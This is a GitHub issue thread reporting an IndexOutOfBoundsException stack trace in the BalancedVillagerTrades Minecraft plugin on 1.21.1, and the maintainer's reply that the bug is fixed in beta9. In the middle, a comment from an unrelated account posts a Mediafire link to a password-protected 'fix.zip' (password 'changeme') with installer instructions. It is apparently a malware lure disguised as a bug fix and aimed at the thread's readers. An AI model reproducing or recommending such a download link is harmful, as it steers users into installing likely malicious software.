### ISSUE TITLE
Bug: 1.21.1 issues

### ISSUE THREAD

**Issue by pjindras** [jacky8399/BalancedVillagerTrades#14]
17:14:11[ERROR] Could not pass event PlayerInteractEntityEvent to BalancedVillagerTrades v2.0-beta7
java.lang.IndexOutOfBoundsException: Index 1 out of bounds for length 1
at java.base/jdk.internal.util.Preconditions.outOfBounds(Unknown Source) ~[?:?]
at java.base/jdk.internal.util.Preconditions.outOfBoundsCheckIndex(Unknown Source) ~[?:?]
at java.base/jdk.internal.util.Preconditions.checkIndex(Unknown Source) ~[?:?]
at java.base/java.util.Objects.checkIndex(Unknown Source) ~[?:?]
at java.base/java.util.ArrayList.set(Unknown Source) ~[?:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.fields.Fields.setIngredient(Fields.java:135) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.fields.Fields.lambda$static$11(Fields.java:36) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.fields.SimpleField.set(SimpleField.java:34) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.fields.FieldProxy.set(FieldProxy.java:31) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.actions.ActionSet.accept(ActionSet.java:38) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.actions.ActionSet.accept(ActionSet.java:20) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.Recipe.handle(Recipe.java:63) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at BalancedVillagerTrades-2.0-beta7.jar/com.jacky8399.balancedvillagertrades.Events.onInteract(Events.java:52) ~[BalancedVillagerTrades-2.0-beta7.jar:?]
at com.destroystokyo.paper.event.executor.asm.generated.GeneratedEventExecutor1433.execute(Unknown Source) ~[?:?]
at org.bukkit.plugin.EventExecutor$2.execute(EventExecutor.java:77) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
at org.bukkit.plugin.RegisteredListener.callEvent(RegisteredListener.java:72) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
at io.papermc.paper.plugin.manager.PaperEventManager.callEvent(PaperEventManager.java:60) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.callEvent(PaperPluginManagerImpl.java:131) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at org.bukkit.plugin.SimplePluginManager.callEvent(SimplePluginManager.java:629) ~[paper-mojangapi-1.21.1-R0.1-SNAPSHOT.jar:?]
at net.minecraft.server.network.ServerGamePacketListenerImpl$3.performInteraction(ServerGamePacketListenerImpl.java:2900) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.network.ServerGamePacketListenerImpl$3.onInteraction(ServerGamePacketListenerImpl.java:2950) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.network.protocol.game.ServerboundInteractPacket$InteractionAction.dispatch(ServerboundInteractPacket.java:138) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.network.protocol.game.ServerboundInteractPacket.dispatch(ServerboundInteractPacket.java:89) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.network.ServerGamePacketListenerImpl.handleInteract(ServerGamePacketListenerImpl.java:2889) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.network.protocol.game.ServerboundInteractPacket.handle(ServerboundInteractPacket.java:76) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.network.protocol.game.ServerboundInteractPacket.handle(ServerboundInteractPacket.java:14) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.network.protocol.PacketUtils.lambda$ensureRunningOnSameThread$0(PacketUtils.java:55) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.TickTask.run(TickTask.java:18) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.util.thread.BlockableEventLoop.doRunTask(BlockableEventLoop.java:152) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.util.thread.ReentrantBlockableEventLoop.doRunTask(ReentrantBlockableEventLoop.java:24) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.doRunTask(MinecraftServer.java:1555) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.doRunTask(MinecraftServer.java:190) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.util.thread.BlockableEventLoop.pollTask(BlockableEventLoop.java:125) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.pollTaskInternal(MinecraftServer.java:1533) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.pollTask(MinecraftServer.java:1526) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.util.thread.BlockableEventLoop.managedBlock(BlockableEventLoop.java:135) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.managedBlock(MinecraftServer.java:1484) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.waitUntilNextTick(MinecraftServer.java:1491) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1338) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:320) ~[leaf-1.21.1.jar:1.21.1-DEV-19277ee]
at java.base/java.lang.Thread.run(Unknown Source) ~[?:?]

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jacky8399** [comment]
Fixed in [beta9](https://github.com/jacky8399/BalancedVillagerTrades/releases/tag/v2.0-beta9)
